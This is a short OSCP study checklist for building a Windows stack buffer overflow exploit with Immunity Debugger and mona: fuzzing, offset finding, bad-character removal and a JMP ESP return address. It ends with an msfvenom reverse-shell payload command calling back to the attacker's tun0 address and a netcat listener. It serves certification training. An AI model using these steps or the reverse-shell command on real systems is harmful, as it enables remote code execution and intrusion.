Buffer Overflow preparation for OSCP
- Run fuzzer.py & make a note of the largest number of bytes that were sent
- Crashed at 2000 bytes
-
Generate a cyclic pattern of a length 400 bytes longer than the string that crashed the server (2000 + 400)
- ./pattern_create.rb -l 2400
-
Copy the output and place it into the payload var of exploit.py
-
Restart the app in Immunity Debugger & Run exploit.py
-
While the unique buffer is on the stack, use mona's findmsp command with the distance arg. set to the pattern length (2400)
- !mona config -set workingfolder c:\mona%p
- !mona findmsp -distance 2400
-
Set the offset var to this value in exploit.py(1978)
-
Set the payload var to an empty string
-
Set the retn var to “BBBB”
-
Restart the app in Immunity & Run exploit.py (EIP should be overwritten with 4 B's (e.g 42424242)
-
Generate a bytearray with mona (& exclude null byte \x00 by default), note the location of bytearray.bin
- !mona bytearray -b “\x00”
-
Generate an identical bytearray with bytearray.py
-
Update exploit.py and set the payload var to the string of badchars the script generates
-
Restart the app in Immunity & Run exploit.py, make note of the address to which ESP register points
- !mona compare -f C:\mona\oscp\bytearray.bin -a [ESP]
-
Generate a new bytearray with mona, specifying the found badchars along with \x00 & Update payload var in exploit.py and remove the new badchars as well
- !mona bytearray -b “\x00\x07\x08\x2e\x2f\xa0\xa1”
-
Restart app & Run exploit
-
Do this until results status returns “Unmodified”. This indicates that no more badchars exist.
-
Run the following mona command with all the identified badchars (including \x00)
- !mona jmp -r esp -cpb “\x00\x07\x08\x2e\x2f\xa0\xa1”
-
Choose an address and update exploit.py, setting the retn var to the address, written backwards (little endian).
- \x62\x50\x11\xaf -> \xaf\x11\x50\x62
- msfvenom (LHOST=kali_vpn_ip, -b with all the identified badchars)
- msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x08\x2e\x2f\xa0\xa1" -f c
- Update payload var in exploit.py
- padding = “\x90” * 16
- start netcat listener on attacker machine (nc -nlvp 4444)
- Restart app in immunity & Run exploit.py